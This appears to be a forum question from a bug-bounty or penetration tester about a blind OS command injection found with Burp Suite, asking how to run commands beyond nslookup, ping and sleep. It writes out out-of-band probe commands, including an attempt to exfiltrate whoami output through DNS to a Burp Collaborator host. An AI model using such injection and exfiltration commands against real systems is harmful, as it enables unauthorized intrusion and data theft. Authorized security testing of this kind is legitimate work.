# out-of-band data exfiltration Command Injection

Tags: vulnerability, injection, vulnerability-scanners, burp-suite

A few days ago I found a vulnerability in a site of scope using the Burp suite scanner with the command `nslookup xxx.burpcolaborator.com` exploit with the following feature:

```
Issue: OS command injection 
Severity: High 
Confidence: Certain
```

[image]

the vulnerability only responds when using "`" and only responds to the nslookup, sleep and ping binaries including the Burp collaborator.

[image]

[image]

These are the only commands it responds to:

- nslookup xxx.burpcolaborator.com
- ping xxx.burpcolaborator.com
- sleep 10

other commands like `nslookup $(whoami).xxx.burp collaborator.com` do not give any answer, please I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.